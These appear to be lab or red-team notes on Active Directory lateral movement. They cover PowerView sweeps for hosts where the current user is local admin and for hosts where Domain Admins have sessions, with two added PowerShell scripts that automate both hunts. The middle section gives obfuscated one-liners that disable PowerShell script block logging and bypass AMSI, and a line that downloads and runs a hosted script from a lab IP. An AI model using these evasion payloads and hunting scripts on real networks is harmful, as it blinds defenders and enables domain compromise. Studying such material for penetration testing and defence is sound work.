User Hunting
Finding local admin access
From the compromised machine, always check where the current user already has local admin rights. The PowerView command below sweeps the domain's computer objects and reports every host on which the current user is a local administrator:
Find-LocalAdminAccess -Verbose
Where Find-LocalAdminAccess fails (for example because the service-manager RPC path it relies on is filtered), the Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1 scripts perform the same sweep over WMI and PowerShell Remoting respectively. Dot-source the script, then run the function it defines. Note that a PSRemoting connection also succeeds for members of Remote Management Users, so treat a hit as "can get a remote shell" and confirm admin on the host.
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
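The check that Find-PSRemotingLocalAdminAccess automates, written out by hand as an added example (this is not code from the original page or from PowerView). It reads every enabled computer object from AD over ADSI, attempts a WinRM connection to each, and, because a successful connection only proves remoting rights, has the remote script block report whether the token is really in BUILTIN\Administrators. It assumes a domain-joined host, PowerShell 5.1, and WinRM (TCP 5985) reachable on the targets; the function names are my own.

```powershell
# Added example, not from the original page or from PowerView.
# Assumes: domain-joined host, PowerShell 5.1, WinRM reachable on TCP 5985.

function Get-DomainComputerName {
    [CmdletBinding()]
    param()
    # Enabled computer accounts only: userAccountControl bit 2 (ACCOUNTDISABLE) not set
    $searcher = [ADSISearcher]'(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.Add('dnshostname')
    foreach ($r in $searcher.FindAll()) {
        if ($r.Properties['dnshostname'].Count -gt 0) { [string]$r.Properties['dnshostname'][0] }
    }
}

function Find-PSRemotingAdminAccess {
    [CmdletBinding()]
    param(
        [string[]]$ComputerName = (Get-DomainComputerName),
        [int]$TimeoutSec = 5
    )
    # Short timeouts so dead or firewalled hosts do not stall the sweep
    $opt = New-PSSessionOption -OpenTimeout ($TimeoutSec * 1000) -OperationTimeout ($TimeoutSec * 1000)
    foreach ($c in $ComputerName) {
        try {
            $r = Invoke-Command -ComputerName $c -SessionOption $opt -ErrorAction Stop -ScriptBlock {
                # Runs on the target. Domain accounts are not subject to remote UAC token
                # filtering, so IsInRole reflects real membership in BUILTIN\Administrators.
                # A member of only "Remote Management Users" gets here with IsAdmin = $false.
                $id = [Security.Principal.WindowsIdentity]::GetCurrent()
                $p  = New-Object Security.Principal.WindowsPrincipal($id)
                [pscustomobject]@{
                    User    = $id.Name
                    IsAdmin = $p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
                }
            }
            [pscustomobject]@{ ComputerName = $c; Connected = $true; LocalAdmin = $r.IsAdmin; Detail = $r.User }
        } catch {
            # "Access is denied" (English locale) = reachable but no remoting rights;
            # anything else is usually WinRM off, a firewall, or name resolution.
            $msg = $_.Exception.Message
            $detail = if ($msg -match 'Access is denied') { 'access denied' } else { $msg.Split("`n")[0] }
            [pscustomobject]@{ ComputerName = $c; Connected = $false; LocalAdmin = $false; Detail = $detail }
        }
    }
}

# Usage: show only the hosts where the current token is genuinely local admin
Find-PSRemotingAdminAccess -Verbose | Where-Object LocalAdmin | Format-Table -AutoSize
```

Drop the `Where-Object LocalAdmin` filter to see the hosts where remoting works but the token is not an administrator; those are still useful footholds, just not admin ones.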
Find computers where a domain admin has session
On current Windows this overlaps with the previous check: since Windows 10 1709 / Server 2019, NetSessionEnum (the API behind session enumeration) only answers callers who are local administrators on the target, so any host that returns a session list is one we already administer; on older builds any authenticated domain user could enumerate sessions. Find-DomainUserLocation is flagged by AMSI and recorded by script block logging, so in this lab flow first disable script block logging, then AMSI, from the PowerShell session before running it. The one-liner below (and the hosted script it stands in for) sets the PowerShell ETW provider's m_enabled field to 0, which stops script block events being written.
iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)
OR
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)
Then bypass AMSI. The one-liner below sets the private amsiInitFailed flag in System.Management.Automation.AmsiUtils to true, after which the process skips calling AmsiScanBuffer:
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Now use the PowerView function below. By default it enumerates sessions and logged-on users on every domain computer and reports those belonging to members of Domain Admins (change the target group with -UserGroupIdentity).
Find-DomainUserLocation -Verbose
Find computers where a domain admin session is available and current user has admin access
This means a computer on which a member of Domain Admins has a session (an SMB connection to its shares or services, reported by NetSessionEnum, or a logon reported by NetWkstaUserEnum) and on which our current user is also a local administrator. -CheckAccess adds that second test for every host where a matching session is found, so the output can be pivoted to immediately.
Find-DomainUserLocation -CheckAccess
Find domain admin sessions on the hosts where they are most likely: -Stealth restricts the sweep to file servers, distributed file system (DFS) servers and domain controllers instead of every computer object, which is quicker and much less noisy. -StealthSource narrows it further to one of 'File', 'DFS' or 'DC'.
Find-DomainUserLocation -Stealth
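The core of what Find-DomainUserLocation, -CheckAccess and the -Stealth host set do, written out by hand as an added example (this is not code from the original page or from PowerView). It resolves the members of a target group (Domain Admins by default, nested groups expanded on the DC), calls NetSessionEnum level 10 on each chosen host through P/Invoke, which post-1709 hosts only answer for local admins, and for each matching session tests \\host\ADMIN$ on both the server and the client end, since the admin's logon and cached credentials live on the client machine the session came from. It assumes a domain-joined host and PowerShell 5.1; the function names and the hosts fileserver01 and dc01 in the usage line are placeholders.

```powershell
# Added example, not from the original page or from PowerView.
# Assumes: domain-joined host, PowerShell 5.1. Host names in the usage line are placeholders.

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class NetApi32 {
    [StructLayout(LayoutKind.Sequential)]
    public struct SESSION_INFO_10 {
        [MarshalAs(UnmanagedType.LPWStr)] public string ClientName;
        [MarshalAs(UnmanagedType.LPWStr)] public string UserName;
        public uint Time;
        public uint IdleTime;
    }
    [DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
    public static extern int NetSessionEnum(string serverName, string uncClientName, string userName,
        int level, out IntPtr bufPtr, int prefMaxLen, out int entriesRead, out int totalEntries,
        ref int resumeHandle);
    [DllImport("netapi32.dll")]
    public static extern int NetApiBufferFree(IntPtr buffer);
}
"@

function Get-DomainGroupMemberSam {
    param([string]$GroupName = 'Domain Admins')
    $g = ([ADSISearcher]"(&(objectCategory=group)(cn=$GroupName))").FindOne()
    if (-not $g) { throw "Group '$GroupName' not found" }
    $groupDn = [string]$g.Properties['distinguishedname'][0]
    # LDAP_MATCHING_RULE_IN_CHAIN (1.2.840.113556.1.4.1941) walks nested membership server-side
    $s = [ADSISearcher]"(&(objectCategory=user)(memberOf:1.2.840.113556.1.4.1941:=$groupDn))"
    [void]$s.PropertiesToLoad.Add('samaccountname')
    foreach ($r in $s.FindAll()) { [string]$r.Properties['samaccountname'][0] }
}

function Get-NetSessionInfo {
    param([Parameter(Mandatory)][string]$ComputerName)
    $buf = [IntPtr]::Zero; $read = 0; $total = 0; $resume = 0
    # prefMaxLen -1 = MAX_PREFERRED_LENGTH: let the API allocate the whole list
    $rc = [NetApi32]::NetSessionEnum("\\$ComputerName", $null, $null, 10, [ref]$buf, -1,
                                     [ref]$read, [ref]$total, [ref]$resume)
    if ($rc -ne 0) {
        # 5 = ERROR_ACCESS_DENIED: what Windows 10 1709+ / Server 2019+ return to non-admin callers
        Write-Verbose "NetSessionEnum on $ComputerName returned $rc"
        return
    }
    try {
        $size = [Runtime.InteropServices.Marshal]::SizeOf([type][NetApi32+SESSION_INFO_10])
        for ($i = 0; $i -lt $read; $i++) {
            $ptr = [IntPtr]($buf.ToInt64() + $i * $size)
            $e = [Runtime.InteropServices.Marshal]::PtrToStructure($ptr, [type][NetApi32+SESSION_INFO_10])
            [pscustomobject]@{
                ComputerName = $ComputerName
                UserName     = $e.UserName
                FromHost     = ([string]$e.ClientName).TrimStart('\')
                IdleSeconds  = $e.IdleTime
            }
        }
    } finally {
        [void][NetApi32]::NetApiBufferFree($buf)
    }
}

function Find-TargetUserSession {
    [CmdletBinding()]
    param([string[]]$Targets, [string]$GroupName = 'Domain Admins')
    $targetUsers = Get-DomainGroupMemberSam -GroupName $GroupName
    foreach ($t in $Targets) {
        foreach ($sess in (Get-NetSessionInfo -ComputerName $t)) {
            if ($targetUsers -contains $sess.UserName) {
                # The session is served by $t, but the admin's logon (and cached credentials)
                # lives on FromHost. ADMIN$ is readable only by local admins, so test both ends.
                [pscustomobject]@{
                    AdminUser     = $sess.UserName
                    SessionOn     = $t
                    LoggedOnFrom  = $sess.FromHost
                    IdleSeconds   = $sess.IdleSeconds
                    AdminOnServer = (Test-Path "\\$t\ADMIN$" -ErrorAction SilentlyContinue)
                    AdminOnClient = (Test-Path "\\$($sess.FromHost)\ADMIN$" -ErrorAction SilentlyContinue)
                }
            }
        }
    }
}

# Usage with placeholder hosts; feed file servers, DFS servers and DCs to mimic -Stealth
Find-TargetUserSession -Targets 'fileserver01', 'dc01' -Verbose | Format-Table -AutoSize
```

Rows with AdminOnClient = True are the ones worth pivoting to: the admin is logged on there and we can already run code on it. Hosts that return nothing under -Verbose show the NetSessionEnum return code, so access-denied (5) hosts are distinguishable from unreachable ones.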